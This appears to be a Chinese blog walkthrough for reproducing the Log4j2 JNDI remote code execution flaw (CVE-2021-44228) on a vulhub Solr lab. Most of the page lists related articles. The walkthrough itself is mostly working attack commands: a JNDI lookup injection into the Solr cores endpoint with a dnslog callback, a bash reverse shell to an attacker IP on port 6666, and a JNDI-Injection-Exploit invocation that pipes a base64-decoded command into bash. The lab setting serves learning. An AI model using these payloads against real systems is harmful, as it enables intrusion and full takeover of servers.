log4j2漏洞详解

原创于 2025-03-14 19:36:39 发布 · 223 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#log4j #vulhub

部署运行你感兴趣的模型镜像

打开靶场，先在⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果.

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.peuuh8.dnslog.cn}

如下图可以查看到记录

准备反弹shell（ip替换为自己攻击机的ip）


bash -i >& /dev/tcp/192.168.159.146/6666 0>&1

把上面反弹shell进行base64编码

模块（使用/JNDI-Injection-Exploit-1.0-SNAPSHOT工具）

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

以上可以看到有三个服务，看到熟悉的 rmi 和 ldap ，实际上这个jar的作⽤就是帮我

们⽣成了恶意代码类，并且⽣成了对应的url，然后我们就可以回到刚才的⽹站去进⾏JNDI注⼊...

这⾥在注⼊之前另启动⼀个终端开启监听...

把得到的恶意代码类粘在后面

在攻击机监听上面指令中的6666端口

出现结果便可以执行命令

您可能感兴趣的与本文相关的镜像

TensorFlow-v2.15

TensorFlow

TensorFlow 是由Google Brain 团队开发的开源机器学习框架,广泛应用于深度学习研究和生产环境。它提供了一个灵活的平台,用于构建和训练各种机器学习模型

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与神明画鸭

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

log4j2漏洞原理和漏洞环境搭建复现

dreamthe的博客

03-03

1万+

背景 2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 log4j3远程代码执行漏洞主要由于存在JN

log4j2反序列化漏洞

故事讲予风听

07-02

752

Log4j 是一个流行的Java日志框架，用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出，可以将日志信息输出到控制台、文件、数据库等多种目标。它采用了模块化的架构，包含多个组件，如日志器(Logger)、输出器(Appender)、格式器(Layout)、过滤器(Filter)等。这些组件可以根据需要进行配置和组合，以满足各种日志记录需求。

参与评论您还未登录，请先登录后发表或查看评论

Log4j2漏洞详解（自学）

m0_64481831的博客

03-05

2231

Log4j2是Apache下的流行的Java日志框架，用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出，可以将日志信息输出到控制台、文件、数据库等多种目标，被应用于业务系统开发，用于记录程序输入输出日志信息。Log4j2是Apache的日志框架，用来记录和管理日志信息的。Log4j2漏洞的原理是因为默认支持解析LDAP/RMI协议，且使用了占位符如{}，并会解析里面的内容进行替换，所以攻击者就可以利用这一点构建特殊的恶意的占位符来进行攻击。

Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现

未完成的歌~的博客

03-15

2万+

Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本，其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能，导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数，是通过配置文件中的${}语法调用的，例如：如果在日志消息中使用了，那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值，并将其替换为实际值。

【log4j2漏洞复现与利用】

一个程序员

01-31

4万+

log4j2

log4j2漏洞分析

weixin_47623655的博客

04-11

1497

漏洞标识符为CVE-2021-44228，通常称为Log4Shell或Log4j漏洞，它存在于Log4j的JNDI查找功能中。攻击者可以通过特殊构造的请求利用此漏洞，向Log4j发送恶意请求，从而触发远程代码执行（RCE）漏洞，进而获得服务器上的完全控制权限。这个漏洞的危害非常大，由于Log4j广泛应用于各种Java应用程序中，这意味着攻击者可以利用该漏洞轻松攻击大量的目标。

log4j2漏洞检测工具

05-07

**Log4j2漏洞检测工具详解** 在当前的IT环境中，安全问题日益凸显，特别是针对开源组件的安全漏洞。Log4j2，一个广泛使用的Java日志框架，最近曝出的重大安全漏洞（CVE-2021-44228，被称为Log4Shell）引起了全球的...

精选资源

log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip

12-14

《Apache Log4j2漏洞详解及修复指南》在网络安全领域，Apache Log4j2漏洞是一个备受关注的话题，尤其在2021年底，该漏洞的出现引发了全球范围内的广泛关注。这个漏洞，被称为CVE-2021-44228，影响了广泛使用的Java...

Apache Log4j2 漏洞详谈

infosec的博客

12-16

6019

源于Apache Log4j2这个漏洞的描述很多，也有很多的解法。开这个博的目的就是想分析一下漏洞具体是如何被利用的，这个大黑锅下面都有哪些坑。最近由阿里安全团队爆出来的Apache Log4j2漏洞，可以说是霸占了大部分网安人的朋友圈。同时一张热图也被传来传去，就是下面这个图片。由于Apache Log4j2组件应用的普及性，导致了大部分的应用都受到波及。同时我们也需要知道并不是所有的log功能都是通过Apache Log4j2来实现的，其实我们还有很多选择。众所周知Log4j2是Apache 家的

精选资源

windows热补丁Log4j2漏洞缓解工具漏洞java补丁.zip

12-16

《Windows环境下Log4j2漏洞的Java热补丁与缓解工具详解》在信息技术领域，安全问题始终是不可忽视的重要环节。近年来，Java中的Log4j2漏洞（CVE-2021-44228）引起了广泛关注，它允许远程攻击者通过控制日志输入来...

log4j漏洞分析及总结

热门推荐

csd_ct的专栏

02-14

5万+

2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】，堪称史诗级核弹漏洞，虽然过了这么久，大部分现网中的相关漏洞已经修复，但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘，年前年后比较忙，一直没有好好的分析总结该漏洞，最近学习下刚好补上。漏洞描述及影响 log4j是Apache的一个开源项目，是一个基于Java的日志记录框架。Log4j2是log4j的后继者，被大量用于业务系统开发，记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。

Log4J2漏洞（CVE-2021-44228）原理

m0_62466350的博客

05-07

3856

Apache Log4j2是一个基于Java的日志记录工具，当前被广泛应用于业务系统开发，开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能，导致攻击者可直接构造恶意请求，触发远程代码执行漏洞，从而获得目标服务器权限。漏洞适应版本：2.0

一文读懂面试官都在问的Log4J2漏洞

YangYubo091699的博客

04-11

6331

Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的，该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时，并没有对用户输入的信息进行判断，导致Log4j2请求远程主机上的含有恶意代码的资源并执行其中的代码，从而造成远程代码执行漏洞。

log4j2远程代码执行漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

Bossfrank的博客

04-14

4万+

本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场，攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能，在{}内使用了了JNDI注入的方式，通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码（.class），最终造成了远程代码执行。

【网络安全---漏洞复现】log4j2漏洞详细的复现和利用过程(CVE-2021-44228)

m0_67844671的博客

09-10

4399

Log4j2远程代码执行漏洞复现(cve-2021-44228)，漏洞复现详细过程，cve-2021-44228，Log4j2

Apache Log4j2 漏洞原理

m0_49025459的博客

06-26

2232

Apache Log4j被发现存在一处任意代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等众多组件与大型应用均受影响。

【Log4j2 漏洞与解决方案】

m0_46459413的博客

12-29

601

这本是个不常用的插件，但代码触发到的频率很高，高到你代码中每次触发info，warn，error 等日志写入的时候，都会去校验一下是否执行Lookup的逻辑。如果用你的主机，远程调用我启动的破坏代码(应用服务)呢，这时候你的服务主机就是案板上的肉了，任人宰割。Log4j2 bug的破坏方式是什么，其实很简单，就是类似于SQL注入，这个更厉害，直接是代码注入，代码执行权限自然相当于应用权限。有的项目，可能依赖较为复杂，且不方便重新编译，可以直接在运行时，添加以下JVM参数，这样可以禁止Lookup生效。

Log4j2—漏洞分析(CVE-2021-44228)